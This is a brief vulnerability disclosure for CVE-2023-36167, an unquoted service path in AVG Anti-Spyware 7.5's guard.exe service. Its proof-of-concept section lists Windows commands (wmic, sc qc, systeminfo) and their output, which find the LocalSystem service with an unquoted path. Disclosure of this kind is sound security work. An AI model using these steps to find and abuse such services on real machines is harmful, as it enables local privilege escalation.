CVE-2023-36167
An issue in AVG AVG Anti-Spyware v.7.5 allows an attacker to execute arbitrary code via a crafted script to the guard.exe component
Exploit Title: AVG Anti Spyware 7.5 – Unquoted Service Path
Date: 06/07/2023
Exploit Author: Idan Malihi
Vendor Homepage: https://www.avg.com
Software Link: https://www.avg.com/en-ww/homepage#pc
Version: 7.5
Tested on: Microsoft Windows 10 Pro
CVE : CVE-2023-36167
#PoC
C:\Users>wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v “C:\Windows\” | findstr /i /v “”” AVG Anti-Spyware Guard AVG Anti-Spyware Guard C:\Program Files (x86)\Grisoft\AVG Anti-Spyware 7.5\guard.exe Auto
C:\Users>sc qc “AVG Anti-Spyware Guard” [SC] QueryServiceConfig SUCCESS
SERVICE_NAME: AVG Anti-Spyware Guard TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\Grisoft\AVG Anti-Spyware 7.5\guard.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : AVG Anti-Spyware Guard DEPENDENCIES : SERVICE_START_NAME : LocalSystem
C:\Users>systeminfo
Host Name: DESKTOP-LA7J17P OS Name: Microsoft Windows 10 Pro OS Version: 10.0.19042 N/A Build 19042 OS Manufacturer: Microsoft Corporation
What do you think?
It is nice to know your opinion. Leave a comment.